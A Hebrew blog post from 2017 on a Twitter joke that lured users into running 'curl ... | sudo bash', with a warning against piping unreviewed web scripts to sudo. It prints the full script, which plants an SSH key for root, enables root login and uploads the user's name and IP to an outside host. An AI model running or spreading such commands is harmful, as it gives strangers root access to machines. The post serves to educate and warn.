אינטרנט ישראל
  • ראשי
  • אודות רן בר-זיק ואינטרנט ישראל
  • ערוץ טלגרם
  • מסטודון
  • התחברו אלי בטוויטר
  • התחברו אלי בלינקדאין
  • ספר ג'אווהסקריפט
  • ראשי
  • אודות רן בר-זיק ואינטרנט ישראל
  • ערוץ טלגרם
  • מסטודון
  • התחברו אלי בטוויטר
  • התחברו אלי בלינקדאין
  • ספר ג'אווהסקריפט
ראשי » חדשות אינטרנט » יצירת בוטנט ללא צורך בידע טכני

יצירת בוטנט ללא צורך בידע טכני

רן בר-זיק דצמבר 13, 2017 9:01 am תגובה אחת

ציוץ אחד, זה מה שמשתמש אחד בטוויטר היה צריך בשביל לגרום למשתמשים להריץ קוד במחשבים שלהם

כדאי תמיד להשאר מעודכנים! אם יש לכם טלגרם, בדקו את ערוץ הטלגרם של האתר שבו אני מעדכן על פוסטים חדשים 🙂 אם אתם רוצים ללמוד תכנות באופן מקיף ומסודר, הצטרפו לאלפי הלומדים בפרויקט "ללמוד ג'אווהסקריפט בעברית" שמלמד לתכנת בג'אווהסקריפט, ב-Node.js ובריאקט וגם מלמד על תרומה לקוד פתוח. גם ספרים דיגיטליים וגם ספרים מודפסים. בשיתוף הקריה האקדמית אונו ובתמיכת חברות מובילות כגון Wix, Outbrain, Elementor, Iron Source, Chegg, Really Good ועוד.

הרבה פעמים כשאנחנו שומעים על פריצות, האקינג וכמובן ״סייבר״, אנחנו חושבים בעיקר על מומחי מחשבים העשויים ללא חת שיושבים ימים ושבועות ומייצרים תוכנות מחשב מורכבות ומתוחכמות. המציאות היא שעולם ההאקינג ניזון בעיקר מטמטום של משתמשים (לעתים גם משתמשים בכירים) ופאשלות תכנותיות מביכות.

דוגמה נהדרת לטמטום של מנהלי מערכות אפשר למצוא בציוץ של משתמש טוויטר בשם Quad, כל מה שהמשתמש עשה זה להשתמש במשפט הנפוץ Trust me, it’s super fun! המשפט הזה, שהפך למים פופולרי ברשת הוא משפט שגיקים ומתכנתים משתמשים בו באופן תכוף כדי לתאר פעולה טכנית שכדאי לעשות אותה ללא צורך בהסבר נרחב. Quad ביקש מהמשתמשים שלו בציוץ הבא להריץ פקודה מסוימת על גבי הלינוקס שלהם:

צילום מסך מתוך @Kuwaddo
צילום מסך מתוך @Kuwaddo

הפקודה הזו היא פשוטה למדי:

curl https://file.quad.moe/amazing-script.sh | sudo bash

מה היא עושה? זו פקודה בעלת שני חלקים שמופרדת על ידי התו ״|״ (שנקרא בשם pipe). חלקה הראשון שואב סקריפט מהכתובת https://file.quad.moe/amazing-script.sh. חלקה השני מריץ את הסקריפט בהרשאות אדמין מלאה.

מה הסקריפט עושה?

if [ ! -d /root/.ssh ]; then
  mkdir -p /root/.ssh;
fi
curl https://file.quad.moe/lmao.pub >> /root/.ssh/authorized_keys
echo permitRootLogin yes >> /etc/ssh/sshd_config
echo $USER - $HOME > /tmp/hackme.txt
curl https://ifconfig.me >> /tmp/hackme.txt
curl -F "[email protected]/tmp/hackme.txt" https://file.quad.moe/
rm -rf /tmp/hackme.txt

מדובר בסקריפט סופר פשוט ששותל מפתח כניסה (במקרה הזה של המשתמש Kuwaddo) עם הרשאות מלאות ושולח את פרטי המחשב וה-IP שלו אל קובץ טקסט שבשליטתו של Quad ומוחק את העדויות. סקריפט פשוט שבפשוטים וכל אחד עם ידע טכני מינימלי יכול להבין שמדובר פה בסקריפט שבפועל יכול לקבל שליטה על המחשב/שרת בכל רגע נתון.

Quad כמובן הציב את זה בתור בדיחת גיקים חביבה ובתחילה היא הופצה ככזו. מה שהוא לא צפה זה את הטמטום של מאות משתמשים שקראו את הציוץ והריצו את הפקודה על גבי השרתים והמחשבים שלהם ובכך איפשרו בעצם ל-Quad לקבל עליהם שליטה מלאה בכל רגע נתון. מה משתמש יכול לעשות ברשת של מאות או אפילו אלפי מחשבים? למשל להריץ סקריפט כריה של מטבע קריפטוגרפי, לבצע התקפת DDOS (התקפה מבוזרת שנועדה להפיל שרתים) ונזקים נוספים. רשת כזו של מחשבים בשליטת גורם יחיד שאינו הבעלים שלהם נקראת ׳בוטנט׳. בוט מלשון רובוט ו׳נט׳ מלשון רשת. רשת של רובוטים שהיא בעלת כוח חישוב אדיר ולכל אחד מהם יש IP משלו (במיוחד IP אירופי או אמריקאי) היא רכוש כלכלי רב ערך.

Quad המבועת כמובן שלא התכוון ליצור רשת בוטנט, הוא הוריד את הסקריפט ואת הציוץ המקורי וצייץ על כך, ציוץ שהפך לויראלי:

I want to shoot myself right now.

Is humanity the dumbest thing on earth

I just infected a bunch of servers with my ssh key and enabled root login via a shitty meme pic.twitter.com/4YAP7KB63z

— Quad (@Kuwaddo) December 11, 2017

טוויטר גם השעתה את החשבון המקורי שלו והוא נאלץ לפתוח חשבון אחר בשם Kuwaddo.

זו דוגמה נהדרת ל׳הנדסה חברתית׳, שימוש בחולשות אנוש על מנת לבצע האקינג מוצלח. במקרה הזה, הטמטום של המשתמשים, שאמורים להיות מתוחכמים כיוון שהם משתמשי לינוקס/מק, היה אדיר. וזו הזדמנות מעולה לציין את המובן מאליו: לעולם לעולם לעולם אל תריצו סקריפטים שאתם לא הסתכלתם עליהם ישירות מהרשת. גם אם משתמש אנונימי עם אוואטאר אנימה מדליק אמר שכדאי לסמוך עליו בנושא.

אם אתם רואים wget או curl – זה אומר שהפקודה הזו מביאה משאב כלשהו מהרשת. אם אתם רואים sudo, סימן שאתם נותנים הרשאות אדמין למה שאתם מריצים.

כדאי תמיד להשאר מעודכנים! אם יש לכם טלגרם, בדקו את ערוץ הטלגרם של האתר שבו אני מעדכן על פוסטים חדשים 🙂 אם אתם רוצים ללמוד תכנות באופן מקיף ומסודר, הצטרפו לאלפי הלומדים בפרויקט "ללמוד ג'אווהסקריפט בעברית" שמלמד לתכנת בג'אווהסקריפט, ב-Node.js ובריאקט וגם מלמד על תרומה לקוד פתוח. גם ספרים דיגיטליים וגם ספרים מודפסים. בשיתוף הקריה האקדמית אונו ובתמיכת חברות מובילות כגון Wix, Outbrain, Elementor, Iron Source, Chegg, Really Good ועוד.
אבטחת מידע חדשות אינטרנט

תגובה אחת

  1. משתמש אנונימי (לא מזוהה) הגב דצמבר 13, 2017 בשעה 10:35 am

    5* רק על השורה הראשונה שקרעה אותי מצחוק…

השארת תגובה

ביטול

ללמוד ג'אווהסקריפט בעברית

ללמוד לתכנת ג'אווהסקריפט בעברית שגייס יותר משלוש מאות אלף שקל ולמעלה מ-2000 תומכים - בואו ללמוד עכשיו איך לתכנת.

רשימת הנושאים
  • מדריכים
    • ריאקט
    • טייפסקריפט
    • ECMAScript 6
    • ES20XX
    • Node.js
    • Express
    • רספברי פיי
    • Babel
    • docker
    • MongoDB
    • Git
    • לימוד MySQL
    • SASS
    • jQuery
    • CSS3
    • HTML 5
    • SVN
    • LESS
  • פיתוח אינטרנט
    • פתרונות ומאמרים על פיתוח אינטרנט
    • jQuery Scripts
    • jQuery למתקדמים
    • יסודות בתכנות
    • נגישות אינטרנט
  • חדשות אינטרנט
  • מידע כללי על אינטרנט
    • רשת האינטרנט
    • בניית אתרי אינטרנט
  • rss logo

    לכל המאמרים

    לכל המאמרים שפורסמו באינטרנט ישראל משנת 2008 ועד עכשיו.
  • rss logo

    RSS Feed

    משתמשים בקורא RSS? אם כן, עקבו אחרי אינטרנט ישראל באמצעות פיד ה-RSS!
    מה זה RSS?
  • Twitter logo

    עקבו אחרי בטוויטר

    בחשבון הטוויטר שלי אני מפרסם עדכונים מהירים על חדשות בתחום התכנות והיזמות, התרעות על מצבי חירום ורכילות בוערת על תחום הווב.
    מה זה טוויטר?
  • facebook like image

    ערוץ הטלגרם של אינטרנט ישראל

    בערוץ הטלגרם של אינטרנט ישראל אני מפרסם את הפוסטים של באתר וכן עדכונים טכנולוגיים נוספים.
    מה זה טלגרם?
  • github logo

    הפרויקטים שלי בגיטהאב

    הפרויקטים שאני כותב ושוחררו לציבור ברישיון קוד פתוח נמצאים ברובם בגיטהאב.
חיפוש

כל הזכויות שמורות לרן בר-זיק ולאינטרנט ישראל | מדיניות הפרטיות של אתר אינטרנט ישראל | אתר אינטרנט ישראל נגיש לפי תקן WCAG 2.0 AA | הצהרת הנגישות של האתר | אבטחת מידע ודיווח על בעיית אבטחת מידע

גלילה לראש העמוד